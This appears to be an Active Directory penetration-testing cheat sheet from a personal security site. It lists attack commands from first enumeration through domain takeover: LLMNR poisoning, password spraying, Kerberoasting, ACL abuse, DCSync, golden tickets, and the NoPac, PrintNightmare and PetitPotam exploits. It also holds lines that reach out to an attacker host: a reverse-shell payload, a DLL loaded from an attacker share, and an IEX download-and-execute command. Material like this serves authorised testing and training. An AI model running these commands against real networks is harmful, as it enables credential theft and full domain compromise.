Active Directory Penetration Testing
π Initial Enumeration
Domain Reconnaissance
- Query DNS for domain information (
nslookup ns1.inlanefreight.com) - Capture network traffic (
sudo tcpdump -i ens224) - Analyze LLMNR/NBT-NS/MDNS queries (
sudo responder -I ens224 -A) - Perform network ping sweep (
fping -asgq 172.16.5.0/23) - Run comprehensive nmap scan (
sudo nmap -v -A -iL hosts.txt)
Kerberos User Enumeration
- Clone and compile Kerbrute (
sudo git clone https://github.com/ropnop/kerbrute.git) - Enumerate valid usernames (
kerbrute userenum -d DOMAIN.LOCAL --dc 172.16.5.5 users.txt) - Save results for further attacks
π£ LLMNR/NBT-NS Poisoning
Responder Attack
- Start Responder in passive mode (
responder -hfor options) - Capture NTLMv2 hashes using Responder
- Crack captured hashes (
hashcat -m 5600 hashes.txt rockyou.txt)
Windows-based Poisoning (Inveigh)
- Import Inveigh module (
Import-Module .\Inveigh.ps1) - Review available parameters (
(Get-Command Invoke-Inveigh).Parameters) - Start Inveigh with logging (
Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y) - Use C# version if needed (
.\Inveigh.exe)
Mitigation Check
- Disable NBT-NS via PowerShell on targets
- Verify SMB signing is enforced
π Password Spraying & Password Policies
Enumerate Password Policy
- Check policy via SMB NULL session (
rpcclient -U "" -N 172.16.5.5) - Query domain info (
rpcclient $> querydominfo) - Use enum4linux (
enum4linux -P 172.16.5.5) - Use enum4linux-ng with output (
enum4linux-ng -P 172.16.5.5 -oA results) - LDAP search for policy (
ldapsearch -h 172.16.5.5 -x -b "DC=DOMAIN,DC=LOCAL") - From Windows:
net accountsorGet-DomainPolicy - Check with valid creds (
crackmapexec smb 172.16.5.5 -u user -p pass --pass-pol)
User Enumeration
- Enumerate via enum4linux (
enum4linux -U 172.16.5.5) - Enumerate via rpcclient (
rpcclient $> enumdomuser) - Enumerate via CrackMapExec (
crackmapexec smb 172.16.5.5 --users) - LDAP user search (
ldapsearch -h IP -x -b "DC=DOMAIN,DC=LOCAL" "(&(objectclass=user))") - Use windapsearch.py (
./windapsearch.py --dc-ip 172.16.5.5 -u "" -U)
Password Spraying Attacks
- Spray with rpcclient (
for u in $(cat users.txt); do rpcclient -U "$u%Password123") - Spray with Kerbrute (
kerbrute passwordspray -d domain.local --dc IP users.txt Password123) - Spray with CrackMapExec (
crackmapexec smb IP -u users.txt -p Password123) - From Windows: DomainPasswordSpray (
Invoke-DomainPasswordSpray -Password Welcome1) - Validate credentials (
crackmapexec smb IP -u user -p pass)
π‘οΈ Enumerating Security Controls
Defensive Enumeration
- Check Windows Defender status (
Get-MpComputerStatus) - Review AppLocker policies (
Get-AppLockerPolicy -Effective) - Check PowerShell language mode (
$ExecutionContext.SessionState.LanguageMode)
LAPS Enumeration
- Find LAPS delegated groups (
Find-LAPSDelegatedGroups) - Check extended rights (
Find-AdmPwdExtendedRights) - Get LAPS computers and passwords (
Get-LAPSComputers)
π Credentialed Enumeration
Remote Access
- RDP connection (
xfreerdp /u:user@domain.local /p:pass /v:IP) - WinRM connection (
evil-winrm -i IP -u user) - PSExec connection (
psexec.py domain/user:pass@IP) - WMI connection (
wmiexec.py domain/user:pass@IP)
SMB Enumeration
- Enumerate users with creds (
crackmapexec smb IP -u user -p pass --users) - Enumerate groups (
crackmapexec smb IP -u user -p pass --groups) - Check logged-on users (
crackmapexec smb IP -u user -p pass --loggedon-users) - Enumerate shares (
crackmapexec smb IP -u user -p pass --shares) - Spider shares (
crackmapexec smb IP -u user -p pass -M spider_plus --share SHARE)
SMBMap
- List shares and permissions (
smbmap -u user -p pass -d DOMAIN -H IP) - Recursive directory listing (
smbmap -u user -p pass -H IP -R SYSVOL --dir-only)
BloodHound Collection
- Run BloodHound Python (
sudo bloodhound-python -u user -p pass -ns IP -d domain.local -c all) - Review attack paths in BloodHound GUI
- Identify high-value targets
π» Living Off the Land
Active Directory Module
- List available modules (
Get-Module) - Import AD module (
Import-Module ActiveDirectory) - Gather domain info (
Get-ADDomain) - Find Kerberoastable accounts (
Get-ADUser -Filter {ServicePrincipalName -ne "$null"}) - Enumerate trusts (
Get-ADTrust -Filter *) - Enumerate groups (
Get-ADGroup -Filter * | select name) - Get group members (
Get-ADGroupMember -Identity "Domain Admins")
PowerView Enumeration
- Get domain info (
Get-Domain) - Enumerate domain controllers (
Get-DomainController) - Enumerate users (
Get-DomainUser) - Enumerate computers (
Get-DomainComputer) - Enumerate groups (
Get-DomainGroup) - Enumerate OUs (
Get-DomainOU) - Find interesting ACLs (
Find-InterestingDomainAcl) - Get group members recursively (
Get-DomainGroupMember -Identity "Group" -Recurse) - Find file servers (
Get-DomainFileServer) - Enumerate GPOs (
Get-DomainGPO) - Check domain policy (
Get-DomainPolicy) - Find domain shares (
Find-DomainShare) - Test admin access (
Test-AdminAccess) - Find local admin access (
Find-LocalAdminAccess) - Locate domain users (
Find-DomainUserLocation)
π« Kerberoasting
Linux-based Kerberoasting
- Install Impacket (
sudo python3 -m pip install .) - List SPNs (
GetUserSPNs.py -dc-ip IP DOMAIN/user) - Request all TGS tickets (
GetUserSPNs.py -dc-ip IP DOMAIN/user -request) - Request specific user (
GetUserSPNs.py -dc-ip IP DOMAIN/user -request-user sqldev) - Save to file (
GetUserSPNs.py -request-user sqldev -outputfile hashes.txt) - Crack with Hashcat (
hashcat -m 13100 hashes.txt rockyou.txt)
Windows-based Kerberoasting
- Enumerate SPNs (
setspn.exe -Q */*) - Request TGS ticket (PowerShell:
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken) - Extract tickets with Mimikatz (
mimikatz # kerberos::list /export) - Use Rubeus to check stats (
.\Rubeus.exe kerberoast /stats) - Roast specific user (
.\Rubeus.exe kerberoast /user:sqldev /nowrap) - Roast admin accounts (
.\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap) - Use PowerView (
Get-DomainUser -SPN | Get-DomainSPNTicket -Format Hashcat)
π ACL Enumeration & Attacks
ACL Discovery
- Find interesting ACLs (
Find-InterestingDomainAcl) - Get user SID (
$sid = Convert-NameToSid username) - Find objects user has rights over (
Get-DomainObjectACL -Identity * | ? {$_.SecurityIdentifier -eq $sid}) - Resolve GUIDs (
Get-DomainObjectACL -ResolveGUIDs -Identity *)
ACL Abuse Techniques
- Force password change (
Set-DomainUserPassword -Identity user -AccountPassword $pass) - Add user to group (
Add-DomainGroupMember -Identity 'Group' -Members 'user') - Create fake SPN (
Set-DomainObject -Identity user -SET @{serviceprincipalname='fake/SPN'}) - Remove fake SPN (
Set-DomainObject -Identity user -Clear serviceprincipalname) - Remove from group (
Remove-DomainGroupMember -Identity 'Group' -Members 'user')
π― DCSync Attack
Prerequisites
- Check replication rights (
Get-ObjectAcl "DC=domain,DC=local" -ResolveGUIDs) - Verify account has DS-Replication-Get rights
- Confirm network connectivity to DC
Execute DCSync
- From Linux: (
secretsdump.py -just-dc DOMAIN/user@DC-IP) - From Windows Mimikatz: (
lsadump::dcsync /domain:DOMAIN /user:Administrator) - Extract NTLM hashes from output
- Use VSS for extraction (
secretsdump.py -use-vss)
πͺ Privileged Access
Remote Management Groups
- Enumerate Remote Desktop Users (
Get-NetLocalGroupMember -GroupName "Remote Desktop Users") - Enumerate Remote Management Users (
Get-NetLocalGroupMember -GroupName "Remote Management Users")
WinRM/PowerShell Remoting
- Create PSCredential object
- Connect via Enter-PSSession (
Enter-PSSession -ComputerName HOST -Credential $cred) - Use Evil-WinRM from Linux (
evil-winrm -i IP -u user)
SQL Server Attacks
- Import PowerUpSQL (
Import-Module .\PowerUpSQL.ps1) - Enumerate SQL instances (
Get-SQLInstanceDomain) - Query SQL server (
Get-SQLQuery -Instance "IP" -username user -password pass) - Connect with mssqlclient.py (
mssqlclient.py DOMAIN/USER@IP -windows-auth) - Enable xp_cmdshell (
SQL> enable_xp_cmdshell) - Execute OS commands (
xp_cmdshell whoami)
β‘ Privilege Escalation Attacks
NoPac (SamAccountName Spoofing)
- Clone exploit (
sudo git clone https://github.com/Ridter/noPac.git) - Check vulnerability (
sudo python3 scanner.py domain/user:pass -dc-ip IP) - Get SYSTEM shell (
sudo python3 noPac.py DOMAIN/user:pass -dc-ip IP --impersonate administrator -shell) - Perform DCSync (
sudo python3 noPac.py DOMAIN/user:pass -dump -just-dc-user DOMAIN/administrator)
PrintNightmare (CVE-2021-1675)
- Clone exploit (
git clone https://github.com/cube0x0/CVE-2021-1675.git) - Check for MS-RPRN/MS-PAR (
rpcdump.py @IP | egrep 'MS-RPRN|MS-PAR') - Generate DLL payload (
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IP) - Host SMB share (
sudo smbserver.py -smb2support Share /path/to/dll) - Execute exploit (
sudo python3 CVE-2021-1675.py domain/user:pass@IP '\\ATTACKER-IP\Share\payload.dll')
PetitPotam
- Setup NTLM relay (
sudo ntlmrelayx.py --target http://CA-SERVER/certsrv/certfnsh.asp --adcs) - Clone PetitPotam (
git clone https://github.com/topotam/PetitPotam.git) - Execute attack (
python3 PetitPotam.py ATTACKER-IP DC-IP) - Request TGT with certificate (
gettgtpkinit.py DOMAIN/DC$ -pfx-base64) - Perform DCSync (
secretsdump.py -just-dc-user DOMAIN/administrator -k)
π Trust Relationships
Child to Parent Domain
- Enumerate trusts (
Get-ADTrust -Filter *orGet-DomainTrust) - Map all trusts (
Get-DomainTrustMapping) - Enumerate child domain users (
Get-DomainUser -Domain CHILD.PARENT.LOCAL) - Get KRBTGT hash (
mimikatz # lsadump::dcsync /user:CHILD\krbtgt) - Get child domain SID (
Get-DomainSID) - Get Enterprise Admins SID (
Get-DomainGroup -Domain PARENT.LOCAL -Identity "Enterprise Admins") - Create Golden Ticket with Mimikatz (
kerberos::golden /user:hacker /domain:CHILD /sid:CHILD-SID /krbtgt:HASH /sids:EA-SID /ptt) - Create Golden Ticket with Rubeus (
.\Rubeus.exe golden /rc4:HASH /domain:CHILD /sid:CHILD-SID /sids:EA-SID /user:hacker /ptt) - Access parent domain resources
Cross-Forest Trusts
- Enumerate SPNs in external forest (
Get-DomainUser -SPN -Domain EXTERNAL.LOCAL) - Kerberoast external domain (
.\Rubeus.exe kerberoast /domain:EXTERNAL.LOCAL /user:svcaccount) - Find foreign group members (
Get-DomainForeignGroupMember -Domain EXTERNAL.LOCAL) - Request TGS from external domain (
GetUserSPNs.py -request -target-domain EXTERNAL.LOCAL) - Use BloodHound for trust analysis (
bloodhound-python -d DOMAIN -dc DC-IP -c All)
π οΈ Miscellaneous Attacks
MS-PRN Printer Bug
- Check for printer bug (
Get-SpoolStatus -ComputerName DC) - Exploit if vulnerable
DNS Enumeration
- Dump DNS records via LDAP (
adidnsdump -u domain\user ldap://DC-IP) - Resolve unknown records (
adidnsdump -u domain\user ldap://DC-IP -r)
Password in Description
- Search descriptions (
Get-DomainUser * | Select-Object samaccountname,description) - Check for PASSWD_NOTREQD (
Get-DomainUser -UACFilter PASSWD_NOTREQD)
SYSVOL Enumeration
- List SYSVOL scripts (
ls \\DC\SYSVOL\DOMAIN\scripts) - Search for sensitive files
π Group Policy Attacks
GPP Password Attacks
- Decrypt GPP passwords (
gpp-decrypt) - Search with CrackMapExec (
crackmapexec smb -L | grep gpp) - Extract GPP autologin (
crackmapexec smb IP -u user -p pass -M gpp_autologin)
GPO Enumeration
- List GPOs (
Get-DomainGPO | select displayname) - Check GPO permissions for Domain Users
- Identify modifiable GPOs
π ASREPRoasting
Discover Vulnerable Accounts
- Find DONT_REQ_PREAUTH users (
Get-DomainUser -PreauthNotRequired) - Request AS-REP hash (
.\Rubeus.exe asreproast /user:username /nowrap /format:hashcat) - Crack hash (
hashcat -m 18200 hash.txt rockyou.txt) - From Linux: (
kerbrute userenum -d domain.local --dc DC-IP users.txt)
ποΈ File Transfer Methods
Quick File Hosting
- Python HTTP server (
sudo python3 -m http.server 8001) - Download with PowerShell (
IEX(New-Object Net.WebClient).downloadString('http://IP/file')) - Impacket SMB server (
impacket-smbserver -smb2support Share /path)
Let's Connect
Have a project in mind or want to discuss cybersecurity? Let's talk!